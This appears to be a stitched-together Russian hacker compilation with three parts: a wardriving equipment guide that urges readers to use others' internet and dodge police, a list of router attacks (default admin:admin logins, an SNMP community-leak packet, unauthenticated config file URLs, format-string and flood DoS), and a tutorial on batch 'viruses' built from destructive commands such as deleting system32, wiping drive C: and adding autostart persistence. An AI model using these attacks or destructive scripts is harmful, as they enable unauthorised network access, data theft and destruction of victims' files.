И ещё… Всё нужно делать с умом, чтобы вас не поймали!!!

конецформыначалоформыВооружись до зубов для вардрайвинга
Тяга к халяве всегда была одной из главных особенностей русского национального характера! Методы добычи чего-нибудь “просто так” совершенствуются день ото дня. Наиболее популярным объектом добычи у жителей “виртуальных миров” является интернет. Однако для удачной охоты во всемирной паутине тебе понадобится целый арсенал спецсредств. О них и поговорим.
Особенности национального вардрайвинга
У рядовых пользователей всегда было желание сделать свою жизнь как можно удобнее. Когда-то таким удобством стала незабвенная ОС Windows, и хакеры до сих пор пользуются этим обстоятельством. Примерно в это же время пользователю показали пряник под названием dial-up, который тоже не остался без внимания “заинтересованной общественности”. Сейчас популярность завоевывают мобильность и свобода от проводов. Рядовые пользователи и крупные фирмы отдают все больше предпочтения беспроводным средствам для передачи данных. Как известно, “информация должна быть свободной”, поэтому ничто не мешает пользоваться чьей-нибудь выделенкой бесплатно. При этом в качестве внутренних ресурсов хакер получает документы, пароли к почте и много другой полезной информации той сети, к которой подключился. Существует масса материалов, описывающих методы взлома защиты различных сетей (в том числе беспроводных), написано много тематического софта, однако я расскажу об основе любого взлома – оборудовании. Когда речь идет о “стационарной” работе хакера, все просто. В этом случае подойдет компьютер средней мощности, сетевая карта или, в крайнем случае, модем. Все остальное – дело софта и головы хакера. В случае с вардрайвингом существует несколько обстоятельств и условий, которые являются определяющими факторами при выборе оборудования. Часть из них объективны (дождь, снег, жадность милиции), часть – зависит только от расположения конкретного вардрайвера.
Итак, выделим три главных правила, которые желательно соблюдать при выборе оборудования:
1) Мобильность
Вардрайвер почти обречен на скитания по городу и поиск беспроводных сетей, которые могут оказаться полезными для него. Чтобы эти скитания доставляли как можно меньше неудобств, необходимо позаботиться о комфортном перемещении и максимальном удобстве используемой вычислительной техники. По вопросам перемещения в пространстве обращайся в автомобильные издания. А по поводу вычислительной техники важно соблюсти следующее: это должны быть устройства с минимальным весом и работающие автономно.
2) Незаметность
Любой человек, совершающих противозаконные действия (статью 272 УК РФ еще никто не отменял), должен позаботиться о своей безопасности. В данном случае – привлекать как можно меньше внимания, поэтому попрощайся с параболическими антеннами (хотя их использование дало бы просто уникальные возможности), стационарными компьютерами, костюмами Микки-Мауса и прочими вещами, которые выделяют человека из толпы. Из этого правила (как впрочем, из любого) есть одно довольно интересное исключение, но о нем ниже.
3) Контроль местоположения
Или контроль возможности определения своих координат в пространстве. Это правило может пригодиться в двух случаях: жажда вернуться на “места боевой славы” и желание как можно скорее освободиться от опеки соответствующих органов. Это основные правила, которые рекомендуется использовать вардрайверу. Однако каждый может (а значит, должен?) подкорректировать и дополнить все вышесказанное исходя из своих внешних обстоятельств. Например, можно носить с собой удостоверение работника ЖЭКа, чтобы в любой нужный момент попасть на крышу жилого дома и тем самым добиться лучшего приема сигнала. Пользуясь простыми правилами и соображениями здравого смысла, попробуем подобрать оптимальный набор инструментов для занятий вардрайвингом.
Ружье, брезентовый плащ…
Для продуктивной охоты за беспроводными сетями можно подобрать несколько разных комплектов оборудования, но в большинство из них будет входить:
Ноутбук
Наверное, не стоит лишний раз расписывать роль ноутбука во взломе сети . Если же у тебя остались сомнения по поводу его необходимости в данной затее, почитай www.thg.ru/network/20050806/print.html. В данном обзоре больше всего внимания уделено моделям с самым продолжительным временем автономной работы, а также ноутбукам с наилучшим соотношением “вес-возможности”. Итак, какой же ноутбук нужен вардрайверу? Вот несколько вариантов: IBM ThinkPad X40, Fujitsu-Siemens LifeBook S7010 и Asus M3700N.
Ноутбуки от IBM являются образцом легендарной надежности, почти идеального баланса производительности и мобильности. В этом смысле ThinkPad X40 – не исключение. Только вдумайся: 7,5 часов автономной работы от стандартной батареи позволит работать почти полный день, а ночью ставить компьютер на зарядку (время зарядки – 3,5 часа). Благодаря удивительной легкости и компактности (вес – 1,23 кг, габариты – 268х211х21 мм), а также довольно высокой производительности (Intel Pentium M 1,2 ГГц, 512 Мб DDR SDRAM, видео Intel Extreme Graphics 2 и жесткий диск на 40 Гб) данный ноутбук, возможно, станет идеальным вариантом для вардрайвера. Однако если будет постоянно нужен оптический дисковод или большое количество портов, то данный ноутбук (и все машинки такого класса) уже не является хорошим решением, поскольку с док-станцией компьютер сильно прибавляет в весе. И тут возникает смысл присмотреться к Fujitsu-Siemens LifeBook S7010.
Данная модель также претендует на звание ноутбука с идеальным балансом производительности и мобильности. При весе 1,77 кг LifeBook S7010 обладает 14-дюймовой матрицей, оптическим приводом и большим количеством разъемов: 4х USB, PS/2, LPT, D-Sub, DVI, COM, RJ11. Модульный отсек, в который может быть установлен оптический привод (по умолчанию), жесткий диск или второй аккумулятор – очень существенные плюсы данной машинки. Время автономной работы несколько меньше, чем у предыдущего объекта тестирования, – пять часов. Похоже, в своем классе данный ноутбук является одним из лучших. Недостатков немного: матрица и цена. По поводу первой: было бы более правильным установить матрицу с разрешением 1400×1050 (SXGA+). Цена – $2200 – без комментариев. Стоит ли таких денег данный девайс? Это можно понять, посмотрев на 14-дюймовые ноутбуки в ценовой категории “до $1500″.
Asus M3700N относится к серии M3, которая позиционируется производителем как “Идеальный помощник для бизнес-пользователя: высокопроизводительный процессор, матрица с высоким разрешением, возможность установки второй батареи, небольшой вес и стильный дизайн”. Сразу стоит обратить внимание на матрицу: 14,1″ с разрешением SXGA+(1400×1050), что нечасто встретишь в ноутбуках данной категории. Дизайн действительно стильный, однако качество сборки несколько хуже двух вышеназванных моделей (Asus, конечно, уважаемая марка, однако до IBM ей далеко). Вес довольно небольшой – 2,3 кг, то есть на 500 грамм больше, чем Fujitsu-Siemens LifeBook S7010. Что касается портов вывода (это один из “козырей” Asus), четыре порта USB 2.0, один слот PCMCIA type II, порт LPT и выход на внешний монитор, разъем i-Link (IEEE-1394), инфракрасный порт. А вот беспроводная связь подкачала: всего лишь 802.11b. Обозначенное время работы от батареи – четыре часа, однако это не соответствует действительности. При “офисном режиме” работы ноутбук выдерживает примерно три часа, что является довольно средним показателем.
Вердикт: качественный, довольно легкий ноутбук за небольшие деньги.
Подводя итоги, можно сказать, что все три представленные здесь модели ноутбуков имеют право называться “лучшим выбором для вардрайвера”. Какой больше подходит тебе, решай сам! Стоит, однако, сказать, что чего-то в данном обзоре не хватает. Время поправить это недоразумение, представив еще одну модель. В этот раз для любителей Apple – PowerBook G4.
Данный девайс несколько не вписывается в правило №2 (”Незаметность”) – он слишком сильно отличается от ноутбуков wintel. Однако если для тебя “Think Different” – не пустые слова, это то, что нужно. Посмотрим, что предлагает “яблоко” для нужд рядового взломщика беспроводных сетей. Начнем с того, что процессора PowerPC хватит для решения большинства задач. У PowerBook отличная матрица, яркая и с приличными углами обзора. Вес ноутбука несколько великоват – 2,1 кг (против 1,23 у IBM), зато здесь “отдельная” видеокарта и винчестер на 60 Гб. С точки зрения аппаратной части – очень хорошая машинка для вардрайвера. Однако своеобразный софт делает решение такой задачи нетривиальным. В общем, пусть этот вопрос останется на совести любителей Apple. Остается добавить, что цена на сие чудо компьютерной техники – около $2000.
Внешние “насадки”
Какой бы замечательной вычислительной машиной ты ни обзавелся, для того чтобы взломать беспроводную сеть, нужно…. найти ее. Эффективный радиус охвата у встроенных Wi-Fi-адаптеров – 100 метров. Этого вполне достаточно для работы в офисе, однако для полноценного поиска и поддержки нормального радиолинка – едва ли. Это значит, что нам понадобится внешний Wi-Fi-клиент, причем с выходом на внешнюю антенну. Таким клиентом может быть либо сетевая карта, либо точка доступа с режимом Wireless Client.
Подходящие сетевые карты бывают двух форм-факторов: PCMCI и подключаемые по USB. Первые удобны с точки зрения их компактности, однако к ним неудобно подключать внешнюю антенну. Переходник, в народе именуемый pig-tail, с довольно большим усилием отключается от сетевушки. С другой стороны, если планируется использовать мощную антенну, использование PCMCI-карт – единственный выход. Таких карт на сегодняшний день очень немного, вот самые яркие представители:
Lucent ORiNOCO WaveLAN Turbo 11
Данная карточка совместима со стандартом 802.11b, однако при этом мощность передатчика 15 дБм – один из лучших показателей в своем классе. При работе на скорости 1 Мбит/с производитель обещает дальность связи до 540 метров. Интерфейс карты – PC Card Type II Extended. Цена карты составит около 60-ти вечнозеленых, что довольно дорого.
Cisco AIR-LMC340
Cisco – крупнейший в мире производитель сетевого оборудования. Однако, судя по всему, он отличается здоровым консерватизмом, что проявляется, прежде всего, в небольшом ассортименте беспроводной продукции. Представленная PCMCI-карта уникальна. Она не имеет выхода на внешнюю антенну. Встроенная антенна имеет коэффициент усиления – 2,2 дБ. Но здесь есть что усиливать: мощность передатчика составляет 100 мВт (20 дБ), а в PCMCI-картах почти невозможно встретить это. Более того, такая мощность редко встречается в точках доступа. К сожалению, карта работает в стандарте 802.11b. Цена девайса кусается – ~$200.
Кроме PCMCI-карт, выход на внешнюю антенну имеют некоторые особи сетевых карт, подключаемых по USB. Рассмотрение этих устройств выходит за рамки данной статьи, но их можно легко найти в Сети.
Компас, звезды…
Настоящий охотник за беспроводными сетями должен озаботиться определением координат, причем не столько своих, сколько объектов наблюдения. В любом крупном городе нашей необъятной Родины на сегодняшний день существует масса Wi-Fi-сетей. Запомнить их местоположение без соответствующего устройства нереально. Это насущное устройство имеет название – GPS-приемник.
Нас интересует устройство, которое можно подключить к компьютеру. COM-порт (большинство приемников подключаются именно по этому порту) не устроит: он встречается в современных ноутбуках слишком редко. Достойный пример – Garmin E-Trex Legend C.
При карманном размере (5,6х10,7х3,1 см) навигатор имеет большой цветной дисплей (176х200 пикселей; 3,3х4,3 см) и массу возможностей. Навигатор способен сохранять до 1000 путевых точек, 20 маршрутов по 125 точек, число точек в траектории – до 10 000. eTrex Legend содержит встроенный электронный компас, функцию выхода в заданную точку, функцию поиска обратного пути (TrackBack). Имеется возможность загрузки карт. Приемник неприхотлив и экономичен: для автономной работы в течение 36-ти часов ему требуется всего две АА батарейки, а в автомобиле – питание от штатного “прикуривателя” 12 В. В комплект входит интерфейсный USB-кабель, поэтому подключение к компьютеру не составит проблемы. Цена навигатора – $425.
Существует еще множество GPS-приемников с разными возможностями, но все это отдельные специализированные устройства. Однако существует реальная альтернатива в виде КПК плюс GPS-модуль формата CompactFlash (есть GPS-модули под SD, однако разумнее оставить этот слот под память). Для такой связки подойдет любой современный КПК с разъемами под CompactFlash и SD/MMC. В случае когда “подходит все”, принято акцентировать внимание на ценовых категориях low-end и hi-end, предоставив право выбора “золотой середины” читателю. Что ж, так и сделаем.
HP iPAQ hx2110
iPaq hx 2110 – младшая модель в обновленной линейке HP, состоящей из трех моделей: HP iPAQ hx2110, hx2410 и hx2750. Машинка комплектуется процессором Intel XScale PXA270 с частотой 312 Мгц, набором памяти 64+64 (ОЗУ+ПЗУ). Этого должно быть достаточно для выполнения основных задач, однако про ресурсоемкие задачи придется забыть. Трансфлективный экран имеет разрешение 320×240 точек, что гораздо больше, чем у большинства GPS-приемников. HP iPaq hx 2110 имеет встроенный модуль Bluetooth, который может быть очень удобен при обмене информацией с ПК. Цена устройства – $300.
Вердикт: если планируешь использовать КПК как GPS-навигатор, MP3-плеер и электронную записную книжку – трудно найти лучшее решение.
Fujitsu-Siemens Pocket Loox 718
Данный “карманный помощник класса люкс” является одним из самых дорогих КПК на платформе Pocket PC. Посмотрим, что же может предложить производитель за 530 американских президентов. Первое, что хочется отметить, – сенсорный экран с VGA-разрешением (640×480) это один из главных козырей современных КПК класса hi-end. Такой экран будет удобен не только при использовании GPS, но и практически во всех задачах, решаемых с помощью КПК. А расширить круг таких задач призван Intel XScale PXA272 – процессор, работающий на частоте 520 Мгц, и набор памяти 128+64 (ОЗУ+ПЗУ). Pocket Loox 718 поддерживает полный набор коммуникаций: Wi-Fi, Bluetooth, IrDA, USB-хост. К последнему можно напрямую подключать USB-накопители и другие устройства. Причем покупать дополнительный кабель не придется – он поставляется в комплекте. Отдельно стоит сказать о времени автономной работы (очень важный показатель для вардрайвера): на Pocket Loox 718 установлена батарея очень внушительной емкости (1640 мАч), которой хватает на 12 часов активной работы (при прослушивании музыки батарея “живет” 16 часов).
Вердикт: отличный девайс, сочетающий в себе самые последние достижения в области конструирования КПК.
Что касается GPS-модулей, их на сегодняшний день довольно много на рынке. Цена колеблется в районе $80-150 в зависимости от таких параметров, как точность определения координат, наличие коннектора для внешней антенны и прочее. В общем, при использовании КПК начального уровня цена решения КПК+GPS получается примерно такой же, как у отдельного GPS-приемника.
Стационарный вардрайвинг
Какие бы устройства ты ни использовал, “классический” вардрайвинг предполагает перемещение по городу в поисках беспроводных сетей. Но кто сказал, что это единственный способ получить доступ к “вражеской” сети? Есть другое решение. Как говорится, если вардрайвер не идет к сети, сеть идет к вардрайверу. Описываемый ниже способ подойдет самым отчаянным охотникам за чужой информацией. Итак, суть способа состоит в том, чтобы из дома (офиса, конспиративной квартиры) вести поиск беспроводных сетей и заниматься их взломом (а впоследствии пользоваться интернетом на халяву). Для этого понадобятся: стационарный компьютер или ноутбук, точка доступа, антенна.
Точки доступа
Задача – увидеть как можно больше беспроводных сетей из одной точки. Для того чтобы решить эту задачу, требуется создать как можно более широкую зону охвата собственной точки. Поэтому нам пригодится мощная точка доступа с возможностью подключения внешней антенны. Отличное решение – D-link DWL-2100AP. Это самая мощная двухдиапазонная точка в модельном ряду D-link в ценовой категории до $150. Производитель обещает следующие характеристики:
В модельном ряду D-link есть более мощные точки доступа, которые, к тому же, не сильно отличаются по цене от выбранной (например DWL-3200AP). Однако только DWL-2100AP и DWL-2210AP имеют режим работы “Wireless-client”, то есть эти точки могут быть использованы в качестве беспроводных сетевых карт. Выбор пал на первую по причине ее низкой стоимости. Более того, данная точка доступа может работать в режиме “точка – много точек”, поэтому ты получишь шанс обеспечить халявным интернетом не только себя, но и своих друзей, живущих неподалеку. В комплекте с DWL-2100AP поставляется всенаправленная антенна с коэффициентом усиления 3dbi, однако ее нужно заменить на что-нибудь более стоящее. И здесь есть два совершенно разных решения: всенаправленная или направленная антенна. Первая дает охват по всем направлениям (360 градусов по горизонтали), однако радиус действия при этом довольно небольшой – до 1,5 км на прямой видимости. Направленные антенны дают больший охват, но при этом только в ограниченном сегменте. Такую антенну придется направлять несколько раз, до тех пор пока не будет достигнут желаемый результат.
Удачной охоты!
Вардрайвинг – новое и довольно модное явление, которое может стать национальным видом спорта. Благодаря очень слабой защите беспроводных сетей это занятие стало уделом многих. Тем не менее, в любом деле есть специалисты и дилетанты. Специалиста видно сразу по набору инструментария. Кроме того, это занятие в России является незаконным, поэтому нелишней будет забота о собственной безопасности. В общем, выбирай свой “набор вардрайвера” и занимайся.
Расчет дальности связи для беспроводных устройств
У любого вардрайвера рано или поздно возникает вопрос: как узнать максимальное расстояние, на котором может быть расположена ломаемая точка доступа. И главное: как увеличить это расстояние? Для этого нам нужно обратиться к физическим законам распространения радиоволн, которые, кстати, еще никто не отменял. Для определения дальности связи рассчитывается суммарное усиление тракта и по графику определяется максимальное расстояние.
Для определения суммарного усиления тракта необходимо знать следующее: мощность передатчика (P), коэффициент усиления передающей и приемной антенны (Gt и Gr соответственно), чувствительность приемника (Pmin), потери в коаксиальном кабеле с обоих сторон (в нашем случае ими можно пренебречь). Тогда формула имеет вид: Y = P + Gt + Gr – Pmin. Стоит заметить, что все эти значения должны быть выражены в децибелах (дБ). Для того чтобы перевести милливатты (мВт) в децибелы, нужно взять десятичный логарифм числа и умножить его на 10. Для тех, кому лень считать, хороший калькулятор для расчета радиолинков – www.tayle.com/calc.php.
Не точкой доступа единой
По большому счету, вместо точки доступа можно использовать PCI-адаптер стандарта 802.11b/g и усилитель. Более того, существуют переходники со встроенным усилителем до 200 мВт. Однако при использовании точки доступа выигрыш не столько в мощности, сколько в разнообразии используемых средств. Почти все точки доступа ценовой категории “от $100″ могут работать в нескольких режимах, имеют DHCP-сервер, а также имеют режим hide, что очень важно для личной безопасности.

конецформыначалоформыМожно много писать об ошибках в протоколе WEP, использовании слабых ключей, перехвате воздушного трафика, атаках Man-in-the-Middle и прочей классике взлома Wi-Fi. Но обойти стороной тему ошибок в конкретных устройствах, в конкретных реализациях стандартов – нельзя, хотя бы потому что ты, ломая беспроводные сети, всегда имеешь дело с конкретным девайсом, а не абстрактной моделью, знакомой только по описанию “на бумаге”. И у каждого устройства свои слабости и баги, знать о которых нужно любому Wi-Fi-взломщику.
Возможные слабые места
Думаю, мы сразу начнем с места в карьер и обсудим возможные места, в которых могут скрываться слабости и уязвимости.
Как ты знаешь, помимо Wi-Fi-карточек, существует и множество других, более независимых устройств: видеокамеры с портом 802.11, точки доступа, беспроводные маршрутизаторы и умные пылесосы. Совершенно понятно, что оборудовать каждый такой девайс набором устройств, необходимым для удобной настройки и администрирования, очень дорого да и обычно неудобно. В самом деле, довольно глупая затея – присобачить к точке доступа ЖК-экран и клавиатуру. Так что большинство подобных устройств предоставляют удобный интерфейс для сетевого администрирования через http, а также SNMP. Действительно, интуитивно понятный web-интерфейс и красивый Wizard уже стали стандартом. Это, с одной стороны, плюс – удобно и дешево, а с другой – минус: редкой компании удается соблюсти все критерии информационной безопасности при проектировании таких интерфейсов. Все начинается с банальщины – со стандартных паролей к admin-зонам, ошибок в сценариях, багов в реализации SNMP, а заканчивается незащищенностью секретных данных. Нередко встречаются также более низкоуровневые ошибки – разнообразные переполнения при обработке сетевых пакетов, ошибки в работе DHCP и т.д. и т.п.
Практика позволяет познакомиться со всем этим и долго поддерживать знакомство, и порой не нужно прилагать никаких усилий, чтобы получить доступ к 802.11-устройству.
Доказательство – распространенность первой ошибки, о которой я расскажу.
Стандартные пароли
- Уязвимые устройства – все неадекватно настроенные. Чаще всего случается с девайсами D-Link – любимчиками домашних пользователей.
- Условия атаки – доступ к устройству через TCP/IP-сеть. Ты должен быть либо в одной кабельной сети, либо должен подключиться через Wi-Fi.
- Цель атаки – административный http-интерфейс.
- Описание.
Любое устройство с сетевым http-интерфейсом администрирования поставляется с минимальным набором предустановленных настроек, в том числе админские идентификаторы (логин/пароль). Некоторые пользователи по неизвестной мне причине на протяжении долгого времени не изменяют эти настройки, доверяясь стандартным заводским. Это свойственно, прежде всего, домашним пользователям, которые всерьез считают, что во всей окрестности их дома только они такие прогрессивные и их 802.11-сети ничего не угрожает. Но мы-то с тобой знаем, что это не так. Исторически сложилось так, что самые дешевые и доступные беспроводные устройства производит фирма D-Link. Если ты обнаружил такую точку доступа, считай, что тебе уже везет! А если у нее еще и стандартный SSID и отсутствует всякое шифрование, можешь смело радоваться. Я недавно столкнулся именно с таким случаем, когда просканировал окрестности своего жилища. Без проблем подключился к точке «», получил по DHCP сетевой адрес и сразу попробовал прителнетиться к 80-му порту точки доступа. Тут же выяснил, что там действительно висит некий web-сервер. Набрав в браузере http://192.168.1.1, я еще раз убедился, что передо мной роутер D-Link. Учитывая, что хозяева этого девайса не включили даже примитивного шифрования и не изменили SSID, я без раздумий ввел стандартную для D-LINK комбинацию “admin:admin” в форму аутентификации и получил доступ к админской панели. В итоге я стяжал доступ не только к халявному интернету, но и ко всему устройству: при определенном желании можно было даже увести логин/пароль от СТРИМ-аккаунта, не говоря уже о том, чтобы подменить DNS-серверы.
Чтобы попробовать этот прием в действии для устройств от других производителей, будет полезно ознакомиться со списком стандартных паролей сетевых устройств, который легко найти на www.phenoelit.de/dpl/dpl.html.
Ошибка управления через SNMP
- Уязвимые устройства – Orinoco Residential Gateway и Compaq WL310.
- Условия атаки – доступ к 192/UDP-порту.
- Цель атаки – доступ к SNMP.
- Описание.
SNMP – Simple Network Manager Protocol, простой протокол сетевого управления. Этот довольно старый протокол используется для удаленного управления сетевыми устройствами, в том числе беспроводным оборудованием. Беда в том, что и сам протокол обладает целым рядом недостатков, так еще и производители часто допускают нелепые ошибки. Тут уместно вспомнить ставшую уже крылатой фразу: “Если хотите безопасности при использовании SNMP, не используйте этот протокол”. Не вдаваясь в подробности, расскажу, что указанные в заголовке точки доступа подвержены следующей атаке. Если атакующий пошлет на 192 UDP-порт пакет хитроумного содержания, уязвимая точка ответит на него цепочкой байт, среди которых будет содержаться идентификатор Community name, используемый в этой реализации SNMP для нехитрой аутентификации. Захват этого ключа, а вернее имени, позволит получить доступ к SNMP-интерфейсу устройства. Для реализации атаки необходимо передать пакет следующего содержания:

Злой пакет
“x01×00x00×00x70×00x00×00x00×00x00×00x00×00x00″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×00x00″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×00x00″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×00x00″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×00x00″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×00x00″
“x00×00x00×00x00×00x00×00x00×00x00×00x00×00x00″
“x00×00x00×00x00×00x00×00x00×00x00×00″

Уязвимое устройство должно ответить такой вот цепочкой байт:
01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | …………….
00 00 00 00 00 60 1d 20 2e 38 00 00 18 19 10 f8 | …… .8……
4f 52 69 4e 4f 43 4f 20 52 47 2d 31 31 30 30 20 | ORiNOCO RG-1100
30 33 39 32 61 30 00 00 00 00 00 00 00 00 00 00 | 0392a0……….
02 8f 24 02 52 47 2d 31 31 30 30 20 56 33 2e 38 | ..$.RG-1100 V3.8
33 20 53 4e 2d 30 32 55 54 30 38 32 33 32 33 34 | 3 SN-02UT0823234
32 20 56 00 | 2 V.

Здесь параметр Community name, необходимый для дальнейшей аутентификации, равен 0392a0. Далее уже не составит особого труда написать несложный эксплойт для устройства, например на Perl. Для этого языка существует масса модулей, которые сделают работу с протоколом удобнее. За примером далеко ходить не нужно: Net::SNMP – идеальный вариант.
DoS и неавторизованный доступ
- Уязвимые устройства – Siemens SANTIS 50, Ericsson HN294dp, Dynalink RTA300W.
- Условия атаки – доступ к 280/TCP-порту.
- Цель атаки – DoS админского web-интерфейса, неавторизованный доступ к telnet CLI.
- Описание.
Удаленное администрирование указанных устройств реализуется при помощи web-интерфейса и обычного телнета. К сожалению, по умолчанию эти сервисы доступны только из кабельной сети, но нередко хозяева устройств активизируют возможность администрирования и через порт Wi-Fi.
Опытным путем было установлено, что, если посылать на 280/TCP-порт большое количество пакетов, девайс подвешивает web-интерфейс и позволяет подключиться к telnet CLI без аутентификации. В качестве примитивного эксплойта можно использовать даже известный сканер AMAP от THC:
$ amap 192.168.1.1 280
Если девайс уязвим, тебе удастся без аутентификации подключиться к телнету, получить управляющую информацию (используя команды, описанные в документации) и внести некоторые изменения в работу устройства.
Доступ к секретной информации через web
- Уязвимые устройства – 3Com ADSL 11g Wireless Router, 3Com OfficeConnect Wireless.
- Условия атаки – доступ к 80/TCP-порту.
- Цель атаки – доступ к чувствительной и управляющей информации.
- Описание.
Удивительно, но эти девайсы от 3COM страдают детским недочетом. Любой неавторизованный пользователь может получить в свои руки идентификаторы администратора, а также информацию о сети, в том числе используемые для шифрования ключи. Для получения доступа к этим данным достаточно обратиться через web-браузер к следующим адресам:
/main/config.bin
/main/profile.wlp?PN=ggg
/main/event.logs
Уязвимость format string
- Уязвимое устройство – 3COM OfficeConnect 812.
- Условия атаки – доступ к 80/TCP-порту.
- Цель атаки – реализация DoS-атаки через format string.
- Описание.
Как и положено, на 80-м порту устройства висит http-сервис, предоставляющий доступ к админскому интерфейсу. Если подключиться к устройству браузером, потребуется пройти аутентификацию, введя в web-форму логин и пароль. После неудачной проверки пароля устройство, помимо всего прочего, покажет тебе картинку c URL http://192.168.1.254/graphics/sml3com. Опытным путем было установлено, что, если обратиться браузером к http://192.168.1.254/graphics/sml3com%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s, устройство помигает лампочками и свалится в даун на некоторое время. Также этот девайс позволяет напрямую перезапустить себя через сценарии http://192.168.1.254/adsl_pair_select и
http://192.168.1.254/adsl_reset. Почему-то для доступа к этим страницам проходить аутентификацию не нужно.
Полный список паролей, устанавливаемых по умолчанию для разнообразных устройств, можно найти по адресу www.phenoelit.de/dpl/dpl.html. Этот лист периодически обновляется и содержит самую актуальную информацию.

конецформыначалоформыВ этой статье я не буду рассказывать как создовать вирусы с нуля вы уже это
узнали с моей предведущей статьйи (большая статья по нописанию бат вирусоов).
В этой статье я научу вас
1.Ознокомлю с самыми злыми командами
2.Научу бат переделывать в exe
3.Предложу свою версию вируса
1.
Shutdown -t 0 –s -Эта команда выключает компютер
del *.* /q
После запуска удалятся только файлы (не затронув папки) в той директории, где был запущен файл, т.е. запустили мы этот файл на рабочем столе, все ярлычки исчезли, но теперь уже навсегда. Если запустим файл в «Моих документах» то файлы исчезнут там. Но если поставить параметр /s то будет удаляться и в кататалогах и подкаталогах.
Параметр /q задаёт удаление без подтверждения.
Теперь мы удалим шрифты:
del C:windowsfonts /q
Почему без /s ? А зачем, там нет подпапок.
Правда не все шрифты удаляться системные останутся. Хоть откуда запускайте файл шрифты всё равно удаляться ведь указан путь… можно удалить хоть что вот, например:
del C:windowsMedia /q
Удалит стандартную музыку, например: музыка при запуске системы или при ошибки.
del C:windowssystem32 /q /s
Системная папка, ну я думаю, даже не стоит объяснять, что произойдёт после ликвидации файлов. Но есть один подвох если на файле будут стаять атрибуты “Скрытый” и “Системный” то наши удаление на них не подействует, их попросту пропустят. А вот как раз самые важные файлы то и отмечены этими параметрами (от нечайного стирания). Что в этом случае делать? Придёться сначала писать команду снятия всех атрибутов с файлов, каталогов, подкаталога.
del C:windows*.bmp /q /s
И нет стандартных рисунков, думаю понятно, почему удалены только рисунки ведь стоит маска .bmp если поставить .txt то удаляться текстовые файлы.
Премудрости удаления
Когда мы открываем диск С: мы видим не все файлы, которые там лежат, система их спрятала, для того чтобы их не тронул неопытный пользователь. Так вот раз они такие важные, а почему бы нам их не удалить…
Сделать это можно в два шага, сначала снять с нашего секретного файла атрибут системный и скрытый, а то нам не кто не позволит нечего удалять, а потом возьмем и удалим всё НЕНУЖНОЕ, то есть самое необходимое:
attrib -a -s -h -r C:*.*
del C:*.* /q
Но тут нам много удалить не дадут. Всё тристо раз защищено.
Можно, например, попробовать удалить УСТАНОВЛЕНЫЕ НАМИ программы хранящиеся на диске! С:/ размахом сказал да? Ну, так вот если мы знаем, что все программы по умолчанию записываются в папку Program Files то можно, например, написать вот такую команду:
rd %ProgramFiles% /s /q
А вот если написать:
rd C:Program Files /s /q
то вирус не сработает заявив что таких папок он не нашёл? Каких таких? Наш вирус будет искать папку “Program” и папку “Files”. Ладно у нас есть зарезервированая команда для папки Program Files – %programfiles%. А если мы хотим удалить “Мои документы”. То вирус будет искать папки “Мои” и “Документы”. В этом случае нам помогут двойные кавычки. Можно удалить содержимое «Моих документов» тем более многие хранят там самое важное:
Chcp 1251 Р. Кодовая. стр. т.к. в команде Р. текст.
del “%USERPROFILE%Мои документы*.*” /q /s
——————————————————————————–
Важно! При установки операционки можно задать любую корневую папку и вы по команде cd C:WINDOWS не куда не попадёте. Может у него корневой каталог называется win? Нам поможет имя которое перебросит нас в корнивой каталог как бы он не назывался cd %SystemRoot%. Та же история с папкой пользователя как дойти до рабочего стола? cd “C:Documents and SettingsА тут чё писать????Рабочий стол” Видите где я вас спрашиваю “Тут чё писать” действительно ведь там стоит имя пользователя, угадать почти нереально. Поэтому надо написать cd %USERPROFILE%рабочий стол. Ну в папку Program Files мы уже знаем cd %programfiles%
И не забывайте если есть в какой либо команде русские буквы например “Рабочий стол” или “Мои документы” обязательно в начале пишите команду Chcp 1251
——————————————————————————–
А если мы хотим удалить в папке “Windows” только Текстовые файлы (txt) и Параметры конфигурации (ini), а на диске D: Рисунки (bmp)? Мы напишем три команды одна удаляет то, вторая это… Но можно всё это написать в одной команде:
for %%Q in (C:WINDOWS*.txt *.ini D:*.bmp) do del %%Q
Видно что мы можем написать свои пути в скобках, хоть какие, так же можем пользоваться масками разных комбинаций. А после слова do у нас стоит команда del так вот мы можем написать например attrib +h +s и теперь на диске С: скроются текстовые файлы и файлы ini. Ну суть понятна? В скобках пишем любой путь или пути, а после do любую команду (которую можно применить к файлу).
Теперь давайте предположим что мы сделали вирус, который при загрузке компа создаёт ненужный мусор. “Жертва” его удаляет, а он при загрузке появляется снова. А если “жертва” мусор не удалит? То наш тупой вирус будет его пытаться создать опять, может даже начнёт задавать “жертве” вопросы о перезаписи… “жертва” сразу обнаружит в чём дело и всё исправит. А давайте напишем команду которая проверяет, есть ли наш мусор на том месте где мы его создавали или уже нет. Если есть вирус завершиться. Если нет то сново создаст мусор.
if not VIR*?????????.sys goto x
exit
МУСОР.
Помните как мы создавали мусор? Брали настоящие файлы копировали их с другим расширением и приписывали в начали приставку “VIR”. Так вот наш вирус проверяет, есть ли хоть один файл у которого есть расширение .sys и приставка “VIR” в начале (можете писать что угодно, исходя из содержания вашего вируса). Если таковые имеются он выходит командой exit. Если таких нет, то переходит к точки x и создаёт мусор снова.
Надеюсь вы понимаете что это только небольшой кусок кода вируса, например в начале должна стоять команда перехода в каталог, где будет всё проверяться… Где написано слово “МУСОР” должны быть написаны команды создования мусора.
——————————————————————————–
И ещё, я чё то всё говорю путь диск C:, диск C:, но для полной уверености можно я бы сказал НУЖНО прописать точно такие же команды и для диска D: (в этом же нашем файле вируса) и не только для D:, если не лень накатайте все буквы дисков. Т.к. некоторые умники меняют букву диска на “O” ; “P” ; “Q” ; “R” ; “S” ; “T” ; “U” или ещё какие (правильно делают). Безопасность, будь она не ладна.
rd C: /s /q -а это гдавноя команда удоления вить она может отформотировать диск за 10-20 сек в зовисимости от обёма диска
chcp 1251
cd “%USERPROFILE%Главное менюПрограммы”
md 1 …и.т.д.
и папки будут создаваться в разделе программы.
Или допишите вот так…
chcp 1251
cd “%USERPROFILE%Главное менюПрограммыАвтозагрузка”
md 1 ….и.т.д.
